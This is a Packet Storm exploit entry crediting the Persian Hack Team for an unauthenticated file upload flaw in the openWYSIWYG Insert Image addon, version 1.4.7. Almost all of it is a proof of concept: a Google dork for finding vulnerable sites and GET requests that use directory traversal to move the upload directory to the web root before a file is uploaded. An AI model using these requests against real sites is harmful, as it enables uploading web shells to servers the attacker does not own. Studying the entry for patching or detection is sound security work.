openWYSIWYG Insert Image 1.4.7 Arbitrary File Upload

2017-01-16T00:00:00
ID PACKETSTORM:140520
Type packetstorm
Reporter Mojtaba MobhaM
Modified 2017-01-16T00:00:00

Description

                                        
                                            `# Exploit Title: openWYSIWYG | Insert Image v1.4.7 / Unauthenticated File Upload  
# Date: 2017-1-15  
# Exploit Author: Persian Hack Team  
# Discovered by : Mojtaba MobhaM  
# Home : http://persian-team.ir/  
# Tested on: Windows AND Linux  
# Telegram Channel : @PersianHackTeam   
# Google Dork : inurl:/wysiwyg/addons/imagelibrary/  
  
# POC :  
Unauthenticated File Upload  
GET /admin/wysiwyg/addons/imagelibrary/select_image.php?pos=1&dir=../../uploads/  
You Moust change path To Change Directory to public_html  
GET /admin/wysiwyg/addons/imagelibrary/select_image.php?pos=1&dir=../../../../  
then Upload You File  
  
  
`